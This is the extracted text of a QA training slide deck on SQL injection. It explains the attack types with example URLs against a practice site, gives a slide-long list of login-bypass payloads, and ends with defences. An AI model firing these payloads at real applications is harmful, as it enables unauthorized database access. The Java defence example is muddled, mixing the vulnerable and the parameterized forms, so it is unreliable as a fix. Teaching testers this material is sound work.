![SQL INJECTIONS EXAMPLES
qalab@gmail.com
xxx’) OR 1=1--]
SELECT * FROM users WHERE email=‘qalab@gmail.com’ AND password=md5(‘xxx’) OR 1=1--]’);](https://image.slidesharecdn.com/sql-210228074119/85/SQL-INJECTIONS-EVERY-TESTER-NEEDS-TO-KNOW-17-320.jpg)
SQL INJECTIONS EVERY TESTER NEEDS TO KNOW
- 1. SQL Injections Every Tester Needs To Know BY VLADIMIR ARUTIN
- 2. ABOUT MYSELF VLADIMIR ARUTIN SENIOR QA at AB SOFT ISTQB Certified Test Manager ISTQB and QA Manual Training Instructor Certified Coach, Public Speaker
- 3. OWASP TOP 10 1. INJECTION 2. BROKEN AUTHENTICATION 3. SENSITIVE DATA EXPOSURE 4. XML EXTERNAL ENTITIES (XXE) 5. BROKEN ACCESS CONTROL 6. SECURITY MISCONFIGURATION 7. CROSS-SITE SCRIPTING 8. INSECURE DESERIALIZATION 9. USING COMPONENTS WITH KNOWN VULNERABILITIES 10. INSUFFICIENT LOGGING AND MONITORING
- 4. TYPES OF INJECTIONS SQL HTML XML Shell-command Code Log file LDAP SSI XPath XAML
- 7. EXAMPLES Web application template for search results page: User query text: Generated results: or such results:
- 10. Top Programming Languages 2020
- 11. Top Programming Languages 2020
- 13. WHEN YOU REMINDED THAT you wrote the world’s biggest social network in PHP
- 14. TOTAL REPORTED OPEN SOURCE VULNERABILITIES PER LANGUAGE
- 15. SQL INJECTIONS HOW DOES IT HAPPEN? a web application does not validate values received from a web form, cookie, input parameter, etc., before passing them to SQL queries. Your code uses unsanitized data from user input in SQL statements A malicious user includes SQL elements in the input in a tricky way Your code executes these SQL elements as part of legitimate SQL statements
- 16. EXAMPLES SELECT * FROM users WHERE username = ‘admin’- -’ AND password = ‘password’ SELECT * FROM users WHERE username ="" or ""="" AND password ="" or ""="" SELECT * FROM clients WHERE clientID = 105 OR 1=1
- 17. SQL INJECTIONS EXAMPLES [email protected] xxx’) OR 1=1--] SELECT * FROM users WHERE email=‘[email protected]’ AND password=md5(‘xxx’) OR 1=1--]’);
- 18. SQL INJECTIONS vocabulary ' or 1=1 ' or 1=1– ' or 1=1# ' or 1=1/* admin' – admin' # admin'/* admin' or '1'='1 admin' or '1'='1'– admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1– admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'– admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'– admin') or '1'='1'# admin') or '1'='1'/* 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 admin" – admin" # admin"/* admin" or "1"="1 admin" or "1"="1"– admin" or "1"="1"# admin" or "1"="1"/* admin“ or 1=1 or ""=“ admin" or 1=1
- 19. SQL Injection Types Error-based SQL injection • The attacker creates the SQL injection to make the back-end display an error • The back-end returns an error to the attacker • The attacker uses information contained in the error to escalate the attack • is used to access sensitive information (database type, file names, and more)
- 20. SQL Injection Types Error-based SQL injection Example: http://testphp.vulnweb.com/listproducts.php?cat=1′ Result: The web application displays the following error in the browser: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1 Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74
- 21. SQL Injection Types Union-based SQL injection • The attacker uses a UNION clause in the payload • The SQL engine combines sensitive information with legitimate • information that the web application should display • The web application displays sensitive information
- 22. SQL Injection Types Example: http://testphp.vulnweb.com/artists.php?artist=-1 UNION SELECT 1,version(),current_user() Result: The web application displays the system version and the name of the current user: 5.1.73-0ubuntu0.10.04.1 acuart@localhost Union-based SQL injection
- 23. SQL Injection Types Boolean-based SQL injection • The attacker sends many payloads that make the application return a different resultS depending on TRUE or FALSE • The attacker draws a conclusion from web application behavior for each payload • is often used to check whether any other SQL injections are possible but it can also be used to access sensitive information
- 24. SQL Injection Types Example: http://testphp.vulnweb.com/artists.php?artist=1 AND 1=1 Payload 2: http://testphp.vulnweb.com/artists.php?artist=1 AND 1=0 Result: In both cases, the application behaves differently. The attacker now knows that the application is vulnerable to SQL injections. Boolean-based SQL injection
- 25. SQL Injection Types Time-based SQL injection the attacker sends a payload that includes a time delay command such as SLEEP, which delays the whole response The attacker repeats the process as many times as possible with different arguments is used to guess the content of a database cell a character at a time by using different ASCII values in conjunction with a time delay
- 26. SQL Injection Types Example: http://testphp.vulnweb.com/artists.php?artist=1-SLEEP(3) Result: The page loads with a delay. is vulnerable to SQL injections. Time-based SQL injection
- 27. DEMO TIME
- 28. WARNING DON’T TRY THIS AT HOME VLADIMIR ARUTIN, AB SOFT COMPANY AND IT STEP UNIVERSITY DO NOT ADVOCATE REPLICATING THE ACTIONS IN THIS DEMO AND DO NOT TAKE RESPONSIBILITY FOR THOSE WHO DO. For Educational Purposes Only
- 29. How can you protect yourself? Parameterized Statements Stored procedures Web application firewall Whitelist Input Validation Escaping All User Supplied Input USE LIMIT IN SQL QUeRIES Trust no one Update and patch Use appropriate privileges Continuously monitor SQL statements from dB-connected apps Buy better software
- 30. EXAMPLE OF PROTECTION // Define which user we want to find. String email = "[email protected]"; // Connect to the database. Connection conn = DriverManager.getConnection(URL, USER, PASS); Statement stmt = conn.createStatement(); // Construct the SQL statement we want to run, specifying the parameter. String sql = "SELECT * FROM users WHERE email = '" + email + "'"; // Run the query, passing the 'email' parameter value... ResultSet results = stmt.executeQuery(sql, email); while (results.next()) { // ...do something with the data returned. } String sql = "SELECT * FROM users WHERE email = ?";
- 31. CONCLUSION
- 33. DEMO TIME
- 34. WARNING DON’T TRY THIS AT HOME VLADIMIR ARUTIN, AB SOFT COMPANY AND IT STEP UNIVERSITY DO NOT ADVOCATE REPLICATING THE ACTIONS IN THIS DEMO AND DO NOT TAKE RESPONSIBILITY FOR THOSE WHO DO. For Educational Purposes Only
- 35. THANKS FOR WATCHING AND God bless your Data base